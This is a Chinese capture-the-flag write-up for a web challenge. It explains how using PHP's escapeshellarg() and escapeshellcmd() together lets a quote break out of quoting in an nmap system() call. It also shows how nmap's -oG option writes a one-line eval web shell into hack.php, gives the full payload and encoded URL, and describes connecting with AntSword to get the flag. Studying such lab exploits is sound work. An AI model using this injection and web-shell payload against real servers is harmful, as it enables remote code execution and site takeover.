知识点:
- escapeshellarg()和escapeshellcmd() 两个函数
- nmap的文件写入
- 命令行注入
题解
过程
打开网页,出现一堆代码
首先代码审计
remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用的,这里没什么用
escapeshellarg()和escapeshellcmd() 没见过,学习参考
PHP escapeshellarg()+escapeshellcmd() 之殇
escapeshellarg()讲解(这篇文章只用到前面一小部分)
1.传入的参数是:
172.17.0.2' -v -d a=1
2.经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'
,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
3.经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\'
,这是因为escapeshellcmd对\
以及最后那个不配对儿的引号进行了转义:
http://php.net/manual/zh/function.escapeshellcmd.php
4.最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\'
,由于中间的\\
被解释为\
而不再是转义字符,所以后面的'
没有被转义,与再后面
的'
配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d
a=1’,即向172.17.0.2\
发起请求,POST 数据为a=1'
。
简单的来说就是两次转译后出现了问题,没有考虑到单引号的问题
然后往下看,看到echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
这有个system来执行命令,而且有传参,肯定是利用这里了
这里代码的本意是希望我们输入ip这样的参数做一个扫描,通过上面的两个函数来进行规则过滤转译,我们的输入会被单引号引起来,但是因为我们看到了上面的漏洞所以我们可以逃脱这个引号的束缚
这里常见的命令后注入操作如 | & &&都不行,虽然我们通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转移…
这时候就只有想想能不能利用nmap来做些什么了。
这时候搜索可以发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件
这个命令就是我们的输入可控!然后写入到文件!很自然的想到了上传一个一句话木马了
?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '
执行后会返回文件夹名
然后蚁剑连接(网址为http://599714cf-3438-4346-bbba-e53bc9e518ff.node3.buuoj.cn/?host=%27%20%3C?php%20@eval($_POST[%22hack%22]);?%3E%20-oG%20hack.php%20%27
,密码为hack
),找到flag
payload细节问题
namp <?php phpinfo(); ?> -oG 1.php
可以写入一个文件
namp nmap <?php phpinfo();> -oG 1.php\’
会写成1.php‘ 而不是 1.php
后面没有加引号
加引号但引号前没有空格
后记 学习参考
PHP escapeshellarg()+escapeshellcmd() 之殇
escapeshellarg()讲解
https://www.cnblogs.com/zzjdbk/p/13675394.html
https://blog.csdn.net/weixin_44077544/article/details/102835099
https://blog.csdn.net/qq_26406447/article/details/100711933